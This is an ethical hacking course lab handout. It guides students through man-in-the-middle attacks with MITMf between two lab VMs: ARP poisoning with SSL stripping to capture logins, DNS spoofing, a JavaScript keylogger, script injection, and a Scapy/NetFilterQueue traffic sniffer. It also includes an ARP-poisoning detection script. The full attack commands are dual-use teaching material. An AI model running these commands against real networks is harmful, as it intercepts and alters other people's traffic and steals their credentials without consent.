
CSCI369 Ethical Hacking

This material is copyrighted. It must not be distributed without permission from
Joonsang Baek and Jongkil Kim

Lab 4
Spoofing with MITMf

NOTE: Make sure that your Kali VM is running fine on VirtualBox (VB) and that its
network is set to “NatNetwork”. You also need an Ubuntu VM for today’s task; you can
configure Ubuntu in the same way as Kali. Check that Kali and Ubuntu can communicate
with each other through NatNetwork using the ping command.

1. Performing ARP Poisoning using mitmf

a. MITMf (Man-in-the-middle framework) is more powerful than arpspoof.
We first need to install it on the Kali VM.
[Note] Before starting the installation, bring the package information up to date by
running $ apt-get update
1) First, in the Kali VM, visit
https://github.com/byt3bl33d3r/MITMf/wiki/Installation and follow
the installation instructions.
2) Note that Kali belongs to “Debian and derivatives”. Also, while installing, you
have to load the shell file using the command
“source /usr/bin/virtualenvwrapper.sh”. But in Kali that file is not under
“/usr/bin/..”; you have to use “/usr/local/bin/..” instead.
3) Make sure that /proc/sys/net/ipv4/ip_forward is set to 1. You can check it by typing
$ head /proc/sys/net/ipv4/ip_forward
If the result is 0, execute the following command:
$ echo 1 > /proc/sys/net/ipv4/ip_forward

b. Once the installation is finished, go back to the Ubuntu VM. Run arp -a (or
route -n) to check the MAC address of the gateway.

c. Return to the Kali VM and, in the folder where MITMf is installed, run

$ python mitmf.py --arp --spoof --gateway <IP of gateway> --target <IP of Ubuntu> -i eth0

Go back to the Ubuntu VM, open a web browser and go to www.yahoo.com.
Enter any user name. If you have an account, try to sign in.

Note that SSL strip will only work if www.yahoo.com is not on the HSTS
(HTTP Strict Transport Security) list. If SSL strip does not work well, it
may mean that www.yahoo.com is on the HSTS list. To remove
www.yahoo.com from HSTS in the Firefox browser:
1) Close all open tabs
2) Open the browsing history (Ctrl + Shift + H)
3) Search "yahoo"
4) Right-click on all sites under yahoo.com and select "Forget About This
Site".
5) Make sure that you access www.yahoo.com again while mitmf is running in
the Kali VM.


Check what happens on the terminal of the Kali VM. Can you see the username (and
password, if you have an account)?
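A defender-side check for the ARP poisoning set up in step c, as an added example that is not part of the lab handout: it parses two snapshots of arp -a output taken on the victim (the Ubuntu VM) and flags the two symptoms that mitmf --arp --spoof leaves behind, a changed gateway MAC and one MAC answering for several IPs. The gateway address 10.0.2.1 is the one used later in this handout; the MAC addresses and the 10.0.2.4 host (assumed to be the Kali VM) are constructed for the example.

```python
import re

# Linux `arp -a` prints lines such as:  ? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3
ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17})", re.I)

def parse_arp(output):
    """Return {ip: mac} from the text of `arp -a`; incomplete entries are skipped."""
    table = {}
    for line in output.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def arp_alerts(before, after, gateway_ip):
    """Compare two ARP snapshots and return a list of findings.

    Two signs of ARP poisoning as done by mitmf --arp --spoof:
      1. the gateway's MAC address changed between the snapshots;
      2. one MAC address now answers for several IPs (attacker and gateway).
    """
    alerts = []
    old_gw, new_gw = before.get(gateway_ip), after.get(gateway_ip)
    if old_gw and new_gw and old_gw != new_gw:
        alerts.append("gateway %s changed MAC %s -> %s" % (gateway_ip, old_gw, new_gw))
    by_mac = {}
    for ip, mac in after.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append("MAC %s claims several IPs: %s" % (mac, ", ".join(sorted(ips))))
    return alerts

# Constructed snapshots taken on the victim: 10.0.2.1 is the gateway, 10.0.2.4 the
# (assumed) Kali VM. After the attack the gateway entry carries Kali's MAC.
BEFORE = """? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3
? (10.0.2.4) at 08:00:27:aa:bb:cc [ether] on enp0s3
"""
AFTER = """? (10.0.2.1) at 08:00:27:aa:bb:cc [ether] on enp0s3
? (10.0.2.4) at 08:00:27:aa:bb:cc [ether] on enp0s3
"""

if __name__ == "__main__":
    for finding in arp_alerts(parse_arp(BEFORE), parse_arp(AFTER), "10.0.2.1"):
        print("ALERT: " + finding)
```

On a real host, feed the function the output of arp -a captured before and after the suspicious period (or on a timer) instead of the constructed strings.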

2. Performing DNS Spoofing using mitmf

Another interesting attack you can perform using mitmf is DNS spoofing:
when the victim tries to open a website on the target machine, he/she will be
redirected to a different website that the attacker has set up.

First we need to set up our web site on the Kali VM. Go to /var/www/html/ and
keep a copy of the existing index.html: cp index.html index2. Then create a new
index.html: leafpad index.html (alternatively, you can run
leafpad /var/www/html/index.html).
Write any simple HTML code, for example:
- Replace “Apache2 Ubuntu Default Page” with “You’re hacked!”
Save the file and exit. Then run a web server on our Kali VM: service apache2 start

As a next step, we modify the mitmf.conf file located at /etc/mitmf. To do this,
run leafpad /etc/mitmf/mitmf.conf

You will see

[[[A]]] #Queries for IPv4 address records
*.live.com = some IP address

Now add the line *.unsw.edu.au = <IP of Kali VM> below it and save the change.

Then, run the following command:

$ python mitmf.py --arp --spoof --gateway <IP of gateway> --target <IP of Ubuntu> -i eth0 --dns

All is set now. Open a web browser on the Ubuntu VM and go to
http://unsw.edu.au. What’s happening?
[Note] Do not forget to stop the apache server in the Kali VM
($ service apache2 stop).

3. Key logging using MITMf

We can capture the username and password by simply running mitmf against our
target, but adding the key logging option allows us to capture whatever the
user on the target machine types into the input fields of any HTTP website
the user visits.

a. In the Kali VM, run

$ python mitmf.py --arp --spoof --gateway <IP of gateway> --target <IP of Ubuntu> -i eth0 --jskeylogger


b. Go back to the Ubuntu VM, open a web browser and go to
solss.uow.edu.au/sid/sols_login_ctl.login, then type any text into the username
and password fields. At the same time, observe the terminal in the Kali VM. Can you
see the ID and password that the victim types in?

4. Script injection using MITMf

a. Return to the Kali VM and run
$ python mitmf.py --arp --spoof --gateway <IP of gateway> --target <IP of Ubuntu> -i eth0 --inject --js-payload "alert('Hello World');"

b. Note that there are a lot of options for “inject” (please check them using
mitmf -h | less). Go back to the Ubuntu VM, open a web browser and visit
www.uow.edu.au. What happens?

c. We have used --js-payload. Can we inject a JavaScript file? You can use the
--js-file option to inject a JavaScript file. Create a JavaScript file using a text
editor (file name: inject.js) and inject the file into the target’s web browser
by running
$ python mitmf.py --arp --spoof --gateway <IP of gateway> --target <IP of Ubuntu> -i eth0 --inject --js-file ./inject.js

If you are familiar with JavaScript, you can inject something more interesting.
Try! Note that we can do much more powerful things with this later on.

5. (Advanced work with mitmf) Although mitmf itself is a very powerful tool, an
ethical hacker often wants to perform attacks more tailored than those already
implemented in mitmf, i.e. more advanced work. One possible way is to use Scapy
and NetFilterQueue to analyze and manipulate the packets in live traffic.
Note: The role of NetFilterQueue is to allow packets (matched by iptables rules
on Linux) to be manipulated from Python.

a. Your task is to write a Python function that displays the IP addresses of the
servers that the victim connects to, using Scapy and NetFilterQueue. Assume that
the victim is the Ubuntu VM.

1) Install NetFilterQueue using the following commands:

$ sudo apt-get install build-essential python-dev libnetfilter-queue-dev
$ git clone https://github.com/fqrouter/python-netfilterqueue.git
$ cd python-netfilterqueue
$ python setup.py install

2) Run mitmf for the ARP spoofing. For example, if the gateway IP address is
10.0.2.1 and the victim IP address is 10.0.2.15, you can run the
following command to hijack the traffic:


$ python mitmf.py --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0

3) Add an iptables rule (in the nat table) using the following command. This will
redirect incoming traffic to NetFilterQueue (queue number 1).
$ iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1

(Tip: You can check the rules by typing
iptables -t nat -L
If you see multiple rules in PREROUTING, you can remove one by using:
iptables -t nat -D PREROUTING <rule number>)

4) Create Lab6.py, implement your_function and execute the following
program in the Kali VM. Print out the information of the captured packets
using Scapy (e.g. print(pkt.summary())).

from netfilterqueue import NetfilterQueue
from scapy.all import IP

VICTIM = "10.0.2.15"  # IP address of the Ubuntu VM (see step 2)

def your_function(pkt):
    # Your task: display the IP addresses of the servers the victim connects to.
    # Print a one-line summary of every packet and, for packets sent by the
    # victim, the destination (server) address.
    print(pkt.summary())
    if pkt.haslayer(IP) and pkt[IP].src == VICTIM:
        print("victim -> server %s" % pkt[IP].dst)

def callback(packet):
    payload = packet.get_payload()  # extract the raw payload of the queued packet
    pkt = IP(payload)               # parse it into a Scapy packet
    your_function(pkt)              # call your function
    packet.accept()                 # release the packet to the network

def main():
    q = NetfilterQueue()            # create the NetfilterQueue object
    q.bind(1, callback)             # bind queue number 1 (the --queue-num above) to callback
    try:
        q.run()                     # main loop
    except KeyboardInterrupt:
        q.unbind()                  # release the binding

main()

5) Access some sites from the Ubuntu VM and check whether you can see the
packet information properly.
